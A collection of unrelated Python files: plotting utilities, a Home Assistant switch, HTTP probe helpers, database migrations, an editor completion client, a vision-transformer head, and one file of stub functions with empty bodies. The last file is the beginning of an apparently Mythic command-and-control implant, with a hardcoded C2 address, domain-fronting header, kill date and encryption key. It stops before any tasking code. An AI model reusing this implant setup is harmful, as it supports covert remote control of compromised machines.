self.confidence_interval_ = cls.smoothed_hazard_confidence_intervals_(
bandwidth, hazard_=self.estimate_.values[:, 0]
)
else:
self.estimate_ = getattr(cls, self.estimate)
self.confidence_interval_ = getattr(cls, "confidence_interval_")
def fill_between_steps(x, y1, y2=0, h_align="left", ax=None, **kwargs):
""" Fills a hole in matplotlib: Fill_between for step plots.
https://gist.github.com/thriveth/8352565
Parameters :
------------
x : array-like
Array/vector of index values. These are assumed to be equally-spaced.
If not, the result will probably look weird...
y1 : array-like
Array/vector of values to be filled under.
y2 : array-Like
Array/vector or bottom values for filled area. Default is 0.
**kwargs will be passed to the matplotlib fill_between() function.
"""
from matplotlib import pyplot as plt
# If no Axes opject given, grab the current one:
if ax is None:
ax = plt.gca()
# First, duplicate the x values
xx = x.repeat(2)[1:]
# Now: the average x binwidth
xstep = (x[1:] - x[:-1]).mean()
# Now: add one step at end of row.
xx = np.append(xx, xx.max() + xstep)
# Make it possible to change step alignment.
if h_align == "mid":
xx -= xstep / 2.0
elif h_align == "right":
xx -= xstep
# Also, duplicate each y coordinate in both arrays
y1 = y1.repeat(2)
if isinstance(y2, np.ndarray):
y2 = y2.repeat(2)
# now to the plotting part:
ax.fill_between(xx, y1, y2=y2, **kwargs)
return ax
|
import math
import matplotlib.pyplot as plt
from utils.colors import create_background
from tree.dynamics import recursive_branch
image_size = (1200, 1920, 3)
image = create_background(image_size, '3f3f3f')
recursive_branch(image, 150, 1, math.pi/2, (500, 1200))
plt.imshow(image)
plt.show()
plt.imsave("wallpaper.png", image)
|
from typing import Any
from scriptable.antlr.TypescriptParser import TypescriptParser
from scriptable.api import AST
from scriptable.api.ast_binding import ASTBinding
class Property(AST[Any]):
def __init__(self, value: str, strict: bool = False):
self.value = value
self.strict = strict
def execute(self, binding: ASTBinding) -> Any:
if self.value in binding.properties:
return binding.properties[self.value]
if self.strict:
raise ValueError(f"no property with name {self.value} found")
return self.value
@staticmethod
def parse(ctx: TypescriptParser.SPropertyContext, strict: bool = False) -> 'Property':
return Property(ctx.getText(), strict)
def __repr__(self):
return self.value
|
"""Support for NHC2 switches."""
import logging
from homeassistant.components.switch import SwitchEntity
from .helpers import nhc2_entity_processor
from nhc2_coco import CoCo, CoCoSwitch
from .const import DOMAIN, KEY_GATEWAY, BRAND, SWITCH
KEY_GATEWAY = KEY_GATEWAY
KEY_ENTITY = 'nhc2_switches'
_LOGGER = logging.getLogger(__name__)
async def async_setup_entry(hass, config_entry, async_add_entities):
"""Load NHC2 switches based on a config entry."""
hass.data.setdefault(KEY_ENTITY, {})[config_entry.entry_id] = []
gateway: CoCo = hass.data[KEY_GATEWAY][config_entry.entry_id]
_LOGGER.debug('Platform is starting')
gateway.get_switches(
nhc2_entity_processor(hass,
config_entry,
async_add_entities,
KEY_ENTITY,
lambda x: NHC2HassSwitch(x))
)
class NHC2HassSwitch(SwitchEntity):
"""Representation of an NHC2 Switch."""
def __init__(self, nhc2switch: CoCoSwitch, optimistic=True):
"""Initialize a switch."""
self._nhc2switch = nhc2switch
self._optimistic = optimistic
self._is_on = nhc2switch.is_on
nhc2switch.on_change = self._on_change
def _on_change(self):
self._is_on = self._nhc2switch.is_on
self.schedule_update_ha_state()
def turn_off(self, **kwargs) -> None:
"""Pass - not in use."""
pass
def turn_on(self, **kwargs) -> None:
"""Pass - not in use."""
pass
async def async_turn_on(self, **kwargs):
"""Instruct the switch to turn on."""
self._nhc2switch.turn_on()
if self._optimistic:
self._is_on = True
self.schedule_update_ha_state()
async def async_turn_off(self, **kwargs):
"""Instruct the switch to turn off."""
self._nhc2switch.turn_off()
if self._optimistic:
self._is_on = False
self.schedule_update_ha_state()
def nhc2_update(self, nhc2switch: CoCoSwitch):
"""Update the NHC2 switch with a new object."""
self._nhc2switch = nhc2switch
nhc2switch.on_change = self._on_change
self.schedule_update_ha_state()
@property
def unique_id(self):
"""Return the lights UUID."""
return self._nhc2switch.uuid
@property
def uuid(self):
"""Return the lights UUID."""
return self._nhc2switch.uuid
@property
def should_poll(self):
"""Return false, since the light will push state."""
return False
@property
def name(self):
"""Return the lights name."""
return self._nhc2switch.name
@property
def available(self):
"""Return true if the light is online."""
return self._nhc2switch.online
@property
def is_on(self):
"""Return true if the light is on."""
return self._is_on
@property
def device_info(self):
"""Return the device info."""
return {
'identifiers': {
(DOMAIN, self.unique_id)
},
'name': self.name,
'manufacturer': BRAND,
'model': SWITCH,
'via_hub': (DOMAIN, self._nhc2switch.profile_creation_id),
}
|
import base64
import json
import time
from json import JSONDecodeError
from typing import Dict, Optional
import requests
from django.conf import settings
from kallisticore import exceptions
from kallisticore.lib.credential import Credential, TokenCredential, \
UsernamePasswordCredential
__all__ = ["http_probe", "http_request", "wait"]
def wait(time_in_seconds: int):
if type(time_in_seconds) is not int:
raise exceptions.FailedAction(
"Expected integer for argument 'time_in_seconds' "
"(got %s)" % type(time_in_seconds).__name__)
time.sleep(time_in_seconds)
def http_request(url: str, method: str = "GET",
request_body: Optional[Dict] = None,
headers: Optional[Dict] = None,
authentication: Optional[Dict] = None) -> Dict:
headers = extract_authentication_headers(authentication, headers)
method = method.upper()
if method in ["GET", "DELETE"]:
response = requests.request(method, url=url, headers=headers)
elif method in ["POST", "PATCH", "PUT"]:
response = requests.request(method, url=url,
data=json.dumps(request_body),
headers=headers)
else:
raise exceptions.InvalidHttpRequestMethod(
"Invalid method: {}. Please specify a valid HTTP request "
"method".format(method))
duration = response.elapsed.total_seconds()
return _append_parsed_json_response(
{'status_code': response.status_code, 'response_text': response.text,
'response_headers': response.headers,
'response_time_in_seconds': duration})
def http_probe(url: str, method: str = "GET",
request_body: Optional[Dict] = None,
headers: Optional[Dict] = None,
authentication: Optional[Dict] = None) -> Dict:
headers = extract_authentication_headers(authentication, headers)
method = method.upper()
if method == "GET":
response = requests.get(url=url, headers=headers)
elif method == "POST":
response = requests.post(url=url, data=json.dumps(request_body),
headers=headers)
else:
raise exceptions.InvalidHttpProbeMethod(
"Invalid method: {}. "
"HTTP Probe allows only GET and POST methods".format(method))
duration = response.elapsed.total_seconds()
if response.status_code < 400:
return _append_parsed_json_response(
{'status_code': response.status_code,
'response_text': response.text,
'response_headers': response.headers,
'response_time_in_seconds': duration})
raise exceptions.FailedAction(
"Http probe failed after {} seconds for url {} with status code {}. "
"Details: {}".format(duration, url, response.status_code,
response.text))
def _append_parsed_json_response(result: dict) -> Dict:
try:
result['response'] = json.loads(result['response_text'])
return result
except (ValueError, KeyError, JSONDecodeError):
return result
def _get_oauth_token_for_http_request_auth_header(config: Dict) -> str:
response_token_key = 'access_token'
if 'token_key' in config:
response_token_key = config['token_key']
cred_class_map = getattr(settings, 'KALLISTI_CREDENTIAL_CLASS_MAP', {})
credential = Credential.build(cred_class_map, config['credentials'])
credential.fetch()
if isinstance(credential, TokenCredential):
return _format_oauth_token(credential.token)
if isinstance(credential, UsernamePasswordCredential):
request_body = {
'grant_type': 'password',
'username': credential.username,
'password': credential.password
}
if 'resource' in config:
request_body['resource'] = config['resource']
client_secret = config['client']['secret'] \
if 'secret' in config['client'] else ''
client_base64 = base64.b64encode('{}:{}'.format(
config['client']['id'], client_secret).encode()).decode('utf-8')
headers = {'Authorization': 'Basic {}'.format(client_base64)}
response = requests.post(config['url'], request_body, headers=headers)
if response.status_code >= 400:
raise exceptions.FailedAction(
"Authentication for http request failed with status code {}. "
"Details: {}".format(response.status_code, response.text))
response_body = response.json()
return _format_oauth_token(response_body[response_token_key])
raise exceptions.InvalidCredentialType(credential.__class__.__name__)
def _format_oauth_token(token: str) -> str:
auth_token_prefix = 'Bearer'
return '{} {}'.format(auth_token_prefix, token)
def extract_authentication_headers(authentication, headers):
if authentication:
if authentication['type'] == 'oauth2_token' and headers:
headers['Authorization'] = \
_get_oauth_token_for_http_request_auth_header(authentication)
elif authentication['type'] == 'oauth2_token' and not headers:
headers = {
'Authorization': _get_oauth_token_for_http_request_auth_header(
authentication)}
return headers
|
#!/usr/bin/env python
#
# Copyright (c) 2017-2019 Cloudify Platform Ltd. All rights reserved
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import subprocess
from cloudify import ctx
from cloudify.exceptions import RecoverableError
def check_for_docker():
command = 'docker ps'
try:
process = subprocess.Popen(
command.split()
)
except OSError:
return False
output, error = process.communicate()
ctx.logger.debug('command: {0} '.format(command))
ctx.logger.debug('output: {0} '.format(output))
ctx.logger.debug('error: {0} '.format(error))
ctx.logger.debug('process.returncode: {0} '.format(process.returncode))
if process.returncode:
ctx.logger.error('Running `{0}` returns error.'.format(command))
return False
return True
if __name__ == '__main__':
if not check_for_docker():
raise RecoverableError('Waiting for docker to be installed.')
|
#!/usr/bin/python
# This script runs quill3d many times for various parameters
import os
import datetime as dt
import rmtlib
import numpy as np # qwe
config = '.laser-piston'
# parameter 0
rmtlib.p0_name = 'ne'
#p0_value = rmtlib.geometric_progression(7e22,3e23,2)
p0_value = np.array([431])
rmtlib.p0_unit = 'ncr'
# parameter 1
rmtlib.p1_name = 'a0'
#p1_value = rmtlib.geometric_progression(400,2500,4)
p1_value = np.array([2800])
#p1_value = np.linspace(200,400,3)
rmtlib.p1_unit = ''
# see list of pp_operations in rmtlib.py
rmtlib.pp_operation = ['density','spectrum','i:x-ux','energy','i:x-y-ux','i:spectrum','mollweide'] # post-processing operations
rmtlib.cwd = os.getcwd() # current directory
t = dt.datetime.now()
print rmtlib.p0_name+', '+rmtlib.p0_unit+',',p0_value
print rmtlib.p1_name+', '+rmtlib.p1_unit+',',p1_value
print rmtlib.pp_operation
os.chdir('../')
os.system('./parse.sh '+config+' > conf')
for p0 in p0_value:
for p1 in p1_value:
rmtlib.prepare_conf(p0,p1,config)
print rmtlib.p0_name+' = '+str(p0)+' '+rmtlib.p0_unit
print rmtlib.p1_name+' = '+str(p1)+' '+rmtlib.p1_unit
os.system('rm results/*')
os.system('cat conf | ./quill')
rmtlib.ppo(p0,p1,config,t.strftime('%y-%m-%d--%H-%M-%S'))
|
"""
disk_item.py
Copyright 2012 Andres Riancho
This file is part of w3af, http://w3af.org/ .
w3af is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation version 2 of the License.
w3af is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with w3af; if not, write to the Free Software
Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
"""
class DiskItem(object):
"""
This is a very simple class that's intended to be a base class for objects
that want to be stored in a DiskList of DiskSet.
"""
__slots__ = ()
def get_eq_attrs(self):
"""
The DiskList class will use the values associated with the attributes
listed in the response of get_eq_attrs() to calculate an md5, which
is saved to the DB, indexed, and then used to have a fast(er)
__contains__ implementation
:return: A list with the attributes of the subclass that make it
"unique". In most cases all attributes which have data
that can't be calculated based on other attributes.
"""
raise NotImplementedError
|
class Solution:
def findShortestSubArray(self, nums: List[int]) -> int:
num_range_dict = {}
max_count = 0
for index, num in enumerate(nums):
if num in num_range_dict:
start, end, count = num_range_dict[num]
new_count = count + 1
num_range_dict[num] = (start, index, new_count)
else:
new_count = 1
num_range_dict[num] = (index, index, new_count)
if new_count > max_count:
max_count = new_count
min_range = float("inf")
for _, value in num_range_dict.items():
start, end, count = value
if count == max_count:
min_range = min(min_range, end-start+1)
return min_range
|
from sagas.nlu.translator import translate
from sagas.tool import init_logger
import logging
logger = logging.getLogger(__name__)
class GoogleTranslator(object):
def translate(self, text, target='zh-CN', source='auto', verbose=False):
"""
$ python -m sagas.nlu.translator_cli translate 'Садись, где хочешь.'
$ python -m sagas.nlu.translator_cli translate 'Садись, где хочешь.' en
$ python -m sagas.nlu.translator_cli translate 'Садись, где хочешь.' en ru
# multi-sentences
$ python -m sagas.nlu.translator_cli translate 'Что в этом конверте? Письмо и фотографии.' ja auto True
$ python -m sagas.nlu.translator_cli translate 'Что в этом конверте? Письмо и фотографии.' en auto True
$ python -m sagas.nlu.translator_cli translate 'I am a student.' ar en True
$ python -m sagas.nlu.translator_cli translate 'I have two refrigerators' th en True
$ python -m sagas.nlu.translator_cli translate 'I have two refrigerators' iw en True
$ python -m sagas.nlu.translator_cli translate '次の信号を右に曲がってください。' zh ja True
# word translations
$ python -m sagas.nlu.translator_cli translate 'city' ar en True
$ python -m sagas.nlu.translator_cli translate 'tiger' lo en True
$ python -m sagas.nlu.translator_cli translate 'गतिविधि' en hi True
$ python -m sagas.nlu.translator_cli translate 'fly' en no True
:param text:
:return:
"""
res,_ = translate(text, source=source, target=target,
trans_verbose=verbose,
# options={'disable_correct'},
options={'disable_correct', 'disable_cache'}
)
print(res)
# print(translate('Садись, где хочешь.'))
# print(translate('I am a student.'))
def trans_en(self, text, target='zh-CN'):
"""
$ python -m sagas.nlu.translator_cli trans_en 'I have two refrigerators' es
$ python -m sagas.nlu.translator_cli trans_en 'I have two refrigerators' he
:param text:
:param target:
:return:
"""
import sagas
sagas.nlu.google_translator.logger.setLevel(logging.DEBUG)
res, _ = translate(text, source='en', target=target,
trans_verbose=True,
options={'disable_correct'}
)
print(res)
if __name__ == '__main__':
import fire
fire.Fire(GoogleTranslator)
|
# Copyright (C) 2013-2019 YouCompleteMe contributors
#
# This file is part of YouCompleteMe.
#
# YouCompleteMe is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# YouCompleteMe is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with YouCompleteMe. If not, see <http://www.gnu.org/licenses/>.
import json
import logging
from ycmd.utils import ToUnicode
from ycm.client.base_request import ( BaseRequest, DisplayServerException,
MakeServerException )
from ycm import vimsupport
from ycm.vimsupport import NO_COMPLETIONS
_logger = logging.getLogger( __name__ )
class CompletionRequest( BaseRequest ):
def __init__( self, request_data ):
super( CompletionRequest, self ).__init__()
self.request_data = request_data
self._response_future = None
def Start( self ):
self._response_future = self.PostDataToHandlerAsync( self.request_data,
'completions' )
def Done( self ):
return bool( self._response_future ) and self._response_future.done()
def _RawResponse( self ):
if not self._response_future:
return NO_COMPLETIONS
response = self.HandleFuture( self._response_future,
truncate_message = True )
if not response:
return NO_COMPLETIONS
# Vim may not be able to convert the 'errors' entry to its internal format
# so we remove it from the response.
errors = response.pop( 'errors', [] )
for e in errors:
exception = MakeServerException( e )
_logger.error( exception )
DisplayServerException( exception, truncate_message = True )
response[ 'line' ] = self.request_data[ 'line_num' ]
response[ 'column' ] = self.request_data[ 'column_num' ]
return response
def Response( self ):
response = self._RawResponse()
response[ 'completions' ] = _ConvertCompletionDatasToVimDatas(
response[ 'completions' ] )
return response
def OnCompleteDone( self ):
if not self.Done():
return
if 'cs' in vimsupport.CurrentFiletypes():
self._OnCompleteDone_Csharp()
else:
self._OnCompleteDone_FixIt()
def _GetExtraDataUserMayHaveCompleted( self ):
completed_item = vimsupport.GetVariableValue( 'v:completed_item' )
# If Vim supports user_data (8.0.1493 or later), we actually know the
# _exact_ element that was selected, having put its extra_data in the
# user_data field. Otherwise, we have to guess by matching the values in the
# completed item and the list of completions. Sometimes this returns
# multiple possibilities, which is essentially unresolvable.
if 'user_data' not in completed_item:
completions = self._RawResponse()[ 'completions' ]
return _FilterToMatchingCompletions( completed_item, completions )
if completed_item[ 'user_data' ]:
return [ json.loads( completed_item[ 'user_data' ] ) ]
return []
def _OnCompleteDone_Csharp( self ):
extra_datas = self._GetExtraDataUserMayHaveCompleted()
namespaces = [ _GetRequiredNamespaceImport( c ) for c in extra_datas ]
namespaces = [ n for n in namespaces if n ]
if not namespaces:
return
if len( namespaces ) > 1:
choices = [ "{0} {1}".format( i + 1, n )
for i, n in enumerate( namespaces ) ]
choice = vimsupport.PresentDialog( "Insert which namespace:", choices )
if choice < 0:
return
namespace = namespaces[ choice ]
else:
namespace = namespaces[ 0 ]
vimsupport.InsertNamespace( namespace )
def _OnCompleteDone_FixIt( self ):
extra_datas = self._GetExtraDataUserMayHaveCompleted()
fixit_completions = [ _GetFixItCompletion( c ) for c in extra_datas ]
fixit_completions = [ f for f in fixit_completions if f ]
if not fixit_completions:
return
# If we have user_data in completions (8.0.1493 or later), then we would
# only ever return max. 1 completion here. However, if we had to guess, it
# is possible that we matched multiple completion items (e.g. for overloads,
# or similar classes in multiple packages). In any case, rather than
# prompting the user and disturbing her workflow, we just apply the first
# one. This might be wrong, but the solution is to use a (very) new version
# of Vim which supports user_data on completion items
fixit_completion = fixit_completions[ 0 ]
for fixit in fixit_completion:
vimsupport.ReplaceChunks( fixit[ 'chunks' ], silent=True )
def _GetRequiredNamespaceImport( extra_data ):
return extra_data.get( 'required_namespace_import' )
def _GetFixItCompletion( extra_data ):
return extra_data.get( 'fixits' )
def _FilterToMatchingCompletions( completed_item, completions ):
"""Filter to completions matching the item Vim said was completed"""
match_keys = [ 'word', 'abbr', 'menu', 'info' ]
matched_completions = []
for completion in completions:
item = _ConvertCompletionDataToVimData( completion )
def matcher( key ):
return ( ToUnicode( completed_item.get( key, "" ) ) ==
ToUnicode( item.get( key, "" ) ) )
if all( matcher( i ) for i in match_keys ):
matched_completions.append( completion.get( 'extra_data', {} ) )
return matched_completions
def _GetCompletionInfoField( completion_data ):
info = completion_data.get( 'detailed_info', '' )
if 'extra_data' in completion_data:
docstring = completion_data[ 'extra_data' ].get( 'doc_string', '' )
if docstring:
if info:
info += '\n' + docstring
else:
info = docstring
# This field may contain null characters e.g. \x00 in Python docstrings. Vim
# cannot evaluate such characters so they are removed.
return info.replace( '\x00', '' )
def _ConvertCompletionDataToVimData( completion_data ):
# See :h complete-items for a description of the dictionary fields.
extra_menu_info = completion_data.get( 'extra_menu_info', '' )
preview_info = _GetCompletionInfoField( completion_data )
# When we are using a popup for the preview_info, it needs to fit on the
# screen alongside the extra_menu_info. Let's use some heuristics. If the
# length of the extra_menu_info is more than, say, 1/3 of screen, truncate it
# and stick it in the preview_info.
if vimsupport.UsingPreviewPopup():
max_width = max( int( vimsupport.DisplayWidth() / 3 ), 3 )
extra_menu_info_width = vimsupport.DisplayWidthOfString( extra_menu_info )
if extra_menu_info_width > max_width:
if not preview_info.startswith( extra_menu_info ):
preview_info = extra_menu_info + '\n\n' + preview_info
extra_menu_info = extra_menu_info[ : ( max_width - 3 ) ] + '...'
return {
'word' : completion_data[ 'insertion_text' ],
'abbr' : completion_data.get( 'menu_text', '' ),
'menu' : extra_menu_info,
'info' : preview_info,
'kind' : ToUnicode( completion_data.get( 'kind', '' ) )[ :1 ].lower(),
# Disable Vim filtering.
'equal' : 1,
'dup' : 1,
'empty' : 1,
# We store the completion item extra_data as a string in the completion
# user_data. This allows us to identify the _exact_ item that was completed
# in the CompleteDone handler, by inspecting this item from v:completed_item
#
# We convert to string because completion user data items must be strings.
#
# Note: Not all versions of Vim support this (added in 8.0.1483), but adding
# the item to the dictionary is harmless in earlier Vims.
# Note: Since 8.2.0084 we don't need to use json.dumps() here.
'user_data': json.dumps( completion_data.get( 'extra_data', {} ) )
}
def _ConvertCompletionDatasToVimDatas( response_data ):
return [ _ConvertCompletionDataToVimData( x ) for x in response_data ]
|
# Generated by Django 1.10.7 on 2017-08-26 07:32
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [("letters", "0007_letter_is_spam")]
operations = [
migrations.AddField(
model_name="letter",
name="message_id_field",
field=models.CharField(
blank=True,
max_length=500,
verbose_name='ID of sent email message "Message-ID"',
),
)
]
|
import socket
import logging
import unittest
from kuyruk import Kuyruk
from kuyruk import Worker
logger = logging.getLogger(__name__)
class Args:
def __init__(self, **kwargs):
self.queues = []
self.logging_level = None
self.max_load = None
self.max_run_time = None
for k, v in kwargs.items():
setattr(self, k, v)
class WorkerTestCase(unittest.TestCase):
def test_default_queue(self):
"""Consume from "kuyruk" if no queue is given"""
k = Kuyruk()
w = Worker(k, Args())
self.assertListEqual(w.queues, ['kuyruk'])
def test_queue_names(self):
"""Hostname is appended to local queues"""
given = ['foo', 'bar.localhost']
k = Kuyruk()
w = Worker(k, Args(queues=given))
hostname = socket.gethostname()
expected = ['foo', 'bar.%s' % hostname]
self.assertListEqual(w.queues, expected)
|
# vim: tabstop=4 shiftwidth=4 softtabstop=4
#
# Copyright 2013 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
"""Add a unique constraint on portforwarding rule
Revision ID: efcfc170aca4
Revises: efcfc169aca4
Create Date: 2014-04-27 18:35:28.148680
"""
revision = 'efcfc170aca4'
down_revision = 'efcfc169aca4'
migration_for_plugins = [
'*'
]
from alembic import op
from sqlalchemy import exc
from neutron.db import migration
TABLE_NAME = 'portforwardingrules'
UC_NAME_1 = 'uniq_pf_rule_10router_id0protocol0outside_port'
UC_NAME_2 = 'uniq_pf_rule_20router_id0protocol0inside_addr0inside_port'
def upgrade(active_plugins=None, options=None):
if not migration.should_run(active_plugins, migration_for_plugins):
return
try:
op.create_unique_constraint(
name=UC_NAME_1,
source=TABLE_NAME,
local_cols=['router_id',
'protocol',
'outside_port', ]
)
except exc.OperationalError as e:
if 1061 == e.orig.args[0]:
pass
else:
raise
op.create_unique_constraint(
name=UC_NAME_2,
source=TABLE_NAME,
local_cols=['router_id',
'protocol',
'inside_addr',
'inside_port', ]
)
try:
op.drop_constraint(
name='outside_port',
table_name=TABLE_NAME,
type_='unique'
)
except exc.OperationalError:
pass
def downgrade(active_plugins=None, options=None):
if not migration.should_run(active_plugins, migration_for_plugins):
return
op.drop_constraint(
name=UC_NAME_2,
table_name=TABLE_NAME,
type_='unique'
)
try:
op.drop_constraint(
name=UC_NAME_1,
table_name=TABLE_NAME,
type_='unique'
)
except exc.OperationalError:
pass
|
def find_noisy():
def find_bad_segments():
def find_bad_components():
def find_blinks():
|
from collections import OrderedDict
import torch
import torch.nn as nn
import torch.nn.functional as F
from mmcv.cnn import build_activation_layer
from mmcv.runner import BaseModule, Sequential
from ..utils import accuracy, accuracy_mixup, lecun_normal_init
from ..registry import HEADS
from ..builder import build_loss
@HEADS.register_module
class VisionTransformerClsHead(BaseModule):
"""Simplest classifier head, with only one fc layer.
*** Mixup and multi-label classification are supported ***
Args:
with_avg_pool (bool): Whether to use GAP before this head.
loss (dict): Config of classification loss.
in_channels (int): Number of channels in the input feature map.
num_classes (int): Number of categories excluding the category.
multi_label (bool): Whether to use one_hot like labels (requiring the
multi-label classification loss). Notice that we support the
single-label cls task to use the multi-label cls loss.
frozen (bool): Whether to freeze the parameters.
"""
def __init__(self,
num_classes=1000,
in_channels=384,
hidden_dim=None,
act_cfg=dict(type='Tanh'),
loss=dict(type='CrossEntropyLoss', loss_weight=1.0),
multi_label=False,
frozen=False,
init_cfg=dict(type='TruncNormal', layer='Linear', std=.02),
**kwargs):
super(VisionTransformerClsHead, self).__init__(init_cfg)
self.in_channels = in_channels
self.num_classes = num_classes
self.hidden_dim = hidden_dim
self.act_cfg = act_cfg
self.multi_label = multi_label
self._init_layers()
# loss
if loss is not None:
assert isinstance(loss, dict)
self.criterion = build_loss(loss)
else:
assert multi_label == False
loss = dict(type='CrossEntropyLoss', loss_weight=1.0)
self.criterion = build_loss(loss)
if frozen:
self.frozen()
def _init_layers(self):
if self.hidden_dim is None:
layers = [('head', nn.Linear(self.in_channels, self.num_classes))]
else:
layers = [
('pre_logits', nn.Linear(self.in_channels, self.hidden_dim)),
('act', build_activation_layer(self.act_cfg)),
('head', nn.Linear(self.hidden_dim, self.num_classes)),
]
self.layers = Sequential(OrderedDict(layers))
def init_weights(self):
super(VisionTransformerClsHead, self).init_weights()
# Modified from ClassyVision
if hasattr(self.layers, 'pre_logits'):
lecun_normal_init(
self.layers.pre_logits,
mode='fan_in', distribution='truncated_normal')
def pre_logits(self, x):
if isinstance(x, tuple):
x = x[-1]
_, cls_token = x
if self.hidden_dim is None:
return cls_token
else:
x = self.layers.pre_logits(cls_token)
return self.layers.act(x)
def frozen(self):
self.layers.eval()
for param in self.layers.parameters():
param.requires_grad = False
def forward(self, x):
assert isinstance(x, (tuple, list)) and len(x) == 1
x = x[0]
x = self.pre_logits(x)
return [self.layers.head(x)]
def loss(self, cls_score, labels, **kwargs):
"""" cls loss forward
Args:
cls_score (list): Score should be [tensor].
labels (tuple or tensor): Labels should be tensor [N, \*] by default.
If labels as tuple, it's used for CE mixup, (gt_a, gt_b, lambda).
"""
single_label = False
losses = dict()
assert isinstance(cls_score, (tuple, list)) and len(cls_score) == 1
# computing loss
if not isinstance(labels, tuple):
# whether is the single label cls [N,] or multi-label cls [N,C]
single_label = \
labels.dim() == 1 or (labels.dim() == 2 and labels.shape[1] == 1)
# Notice: we allow the single-label cls using multi-label loss, thus
# * For single-label cls, loss = loss.sum() / N
# * For multi-label cls, loss = loss.sum() or loss.mean()
avg_factor = labels.size(0) if single_label else None
target = labels.clone()
if self.multi_label:
# convert to onehot labels
if single_label:
target = F.one_hot(target, num_classes=self.num_classes)
# default onehot cls
losses['loss'] = self.criterion(
cls_score[0], target, avg_factor=avg_factor, **kwargs)
# compute accuracy
losses['acc'] = accuracy(cls_score[0], labels)
else:
# mixup classification
y_a, y_b, lam = labels
if isinstance(lam, torch.Tensor): # lam is scalar or tensor [N,1]
lam = lam.unsqueeze(-1)
# whether is the single label cls [N,] or multi-label cls [N,C]
single_label = \
y_a.dim() == 1 or (y_a.dim() == 2 and y_a.shape[1] == 1)
# Notice: we allow the single-label cls using multi-label loss, thus
# * For single-label cls, loss = loss.sum() / N
# * For multi-label cls, loss = loss.sum() or loss.mean()
avg_factor = y_a.size(0) if single_label else None
if not self.multi_label:
losses['loss'] = \
self.criterion(cls_score[0], y_a, avg_factor=avg_factor, **kwargs) * lam + \
self.criterion(cls_score[0], y_b, avg_factor=avg_factor, **kwargs) * (1 - lam)
else:
# convert to onehot labels
if single_label:
y_a = F.one_hot(y_a, num_classes=self.num_classes)
y_b = F.one_hot(y_b, num_classes=self.num_classes)
# mixup onehot like labels, using a multi-label loss
y_mixed = lam * y_a + (1 - lam) * y_b
losses['loss'] = self.criterion(
cls_score[0], y_mixed, avg_factor=avg_factor, **kwargs)
# compute accuracy
losses['acc'] = accuracy(cls_score[0], labels[0])
losses['acc_mix'] = accuracy_mixup(cls_score[0], labels)
return losses
|
#!/usr/bin/python3
import mythic
from mythic import mythic_rest
import asyncio
import json
import base64
import requests
import time
import ast
import types
import math
import random
import socket
import struct
import platform
import os
import getpass
import threading
# from pynput import keyboard
import re
import sys
# import Xlib
# import Xlib.display
import time
import subprocess
from subprocess import Popen, PIPE
import stat
import hashlib
from http.server import BaseHTTPRequestHandler, HTTPServer
from Crypto.Hash import SHA256, SHA512, SHA1, MD5, HMAC
from Crypto.Cipher import AES, PKCS1_OAEP
from Crypto.Random import get_random_bytes
from Crypto.Util.Padding import unpad, pad
from Crypto.PublicKey import RSA
from base64 import b64decode, b64encode
from termcolor import colored
# Global dict containing name and code of the dynamic functions loaded
class Agent:
def __init__(self):
self.Server = "http://95.237.2.234"
self.Port = "8888"
self.URI = "/data"
self.PayloadUUID = "ee86d368-9e02-452d-b50b-46b9075292ee"
self.UUID = ""
self.UserAgent = {"User-Agent": "Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko"}
self.HostHeader = "domain_front"
self.Sleep = "10"
self.Jitter = "23"
self.KillDate = "2022-08-16"
self.Script = ""
self.Encryption_key = "ONqLlT2IUMjCK6ET1OK5Sg39+SyNmAw+7jgG4ggIMsg="
self.Decryption_key = "ONqLlT2IUMjCK6ET1OK5Sg39+SyNmAw+7jgG4ggIMsg="
def get_Server(self):
return self.Server
def set_Server(self, server):
self.Server = server
def get_Port(self):
return self.Port
def set_Port(self, port):
self.Port = port
def get_URI(self):
return self.URI
def set_URI(self, uri):
self.URI = uri
def get_PayloadUUID(self):
return self.PayloadUUID
def set_PayloadUUID(self, payloadUUID):
self.PayloadUUID = payloadUUID
def get_UUID(self):
return self.UUID
def set_UUID(self, uuid):
self.UUID = uuid
def get_UserAgent(self):
return self.UserAgent
def set_UserAgent(self, userAgent):
self.UserAgent = userAgent
def get_Sleep(self):
return self.Sleep
def set_Sleep(self, sleep):
self.Sleep = sleep
def get_Jitter(self):
return self.Jitter
def set_Jitter(self, jitter):
self.Jitter = jitter
def get_Encryption_key(self):
return self.Encryption_key
def set_Encryption_key(self, encryption_key):
self.Encryption_key = encryption_key
def get_Decryption_key(self):
return self.Decryption_key
def set_Decryption_key(self, decryption_key):
self.Decryption_key = decryption_key
class myRequestHandler(BaseHTTPRequestHandler):
def send_response(self, code, message=None):
self.send_response_only(code, message)
self.send_header('Server', self.version_string())
self.send_header('Date', self.date_time_string())
global dynfs
global result
global sudo
dynfs = {}
sudo = ""
responses = []
delegates = []
delegates_address = []
delegates_UUID = []
delegates_aswers = []
result = {}
stopping_functions = []
agent = Agent()
redirecting = False
def encrypt_AES256(data, key=agent.get_Encryption_key()):
